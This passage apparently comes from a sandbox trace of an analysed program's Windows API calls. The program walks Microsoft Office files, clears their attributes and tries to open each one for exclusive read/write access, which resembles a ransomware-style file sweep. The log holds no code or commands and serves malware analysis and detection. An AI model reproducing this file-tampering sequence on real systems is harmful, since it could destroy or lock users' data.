Office\\Office14\\1033\\INFOPATH.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.184] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.185] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.185] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.185] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.185] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS", dwFileAttributes=0x80) returned 0 [0136.185] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.185] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.185] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.185] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.185] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.186] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.186] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.186] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.186] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.186] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.186] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.187] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.187] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.187] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.188] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.188] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.188] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.188] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.188] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.188] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.188] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.188] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.189] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.189] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.189] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.189] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.189] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.189] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.190] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.190] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.190] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.190] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.190] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.190] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.190] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.191] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.191] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.191] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.191] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.191] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.191] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.191] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.191] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.192] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.192] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.192] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.192] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.192] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.192] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.192] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INSTLIST.VRD", dwFileAttributes=0x80) returned 0 [0136.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INSTLIST.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\instlist.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.193] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.193] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.193] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.193] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.194] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD", dwFileAttributes=0x80) returned 0 [0136.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INVENTRY.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\inventry.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.194] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.194] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.194] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.195] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.196] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Invite or Link.one", dwFileAttributes=0x80) returned 0 [0136.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Invite or Link.one" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\invite or link.one"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.197] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.197] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.197] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.197] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.197] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.197] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.197] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.197] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta", dwFileAttributes=0x80) returned 0 [0136.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\Issue Tracking.gta" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\issue tracking.gta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.197] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.197] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.198] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.198] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.198] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\JADE.CSS", dwFileAttributes=0x80) returned 0 [0136.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\JADE.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\jade.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.199] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.199] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.199] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.199] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.199] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\LGND.VSL", dwFileAttributes=0x80) returned 0 [0136.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\LGND.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\lgnd.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.200] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.200] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.200] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.200] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.200] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.200] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.200] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.200] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.201] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.201] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.201] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD", dwFileAttributes=0x80) returned 0 [0136.202] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MOVE.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\move.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.202] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.202] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.202] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.202] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.202] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.202] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV.HXS", dwFileAttributes=0x80) returned 0 [0136.202] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.203] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.203] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.203] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.203] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.203] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.203] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.203] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.203] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.203] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.204] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.204] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.204] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.204] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.204] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.204] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.204] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.205] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.205] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.205] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.205] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.205] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.dev_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.205] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.205] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.206] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.206] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.206] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.HXS", dwFileAttributes=0x80) returned 0 [0136.206] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.206] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.206] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.206] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.206] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.207] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXC", dwFileAttributes=0x80) returned 0 [0136.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.207] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.207] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.207] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.207] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.207] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXT", dwFileAttributes=0x80) returned 0 [0136.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.208] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.208] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.208] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.208] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.208] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_F_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.208] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.208] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.208] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.208] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.209] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.209] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_K_COL.HXK", dwFileAttributes=0x80) returned 0 [0136.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSACCESS_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msaccess_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.209] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.209] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.209] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.209] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.209] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.210] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSO.ACL", dwFileAttributes=0x80) returned 0 [0136.211] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSO.ACL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mso.acl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.211] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.211] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.211] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.211] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.211] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC.HXS", dwFileAttributes=0x80) returned 0 [0136.212] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.212] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.212] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.212] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0136.212] VirtualAlloc 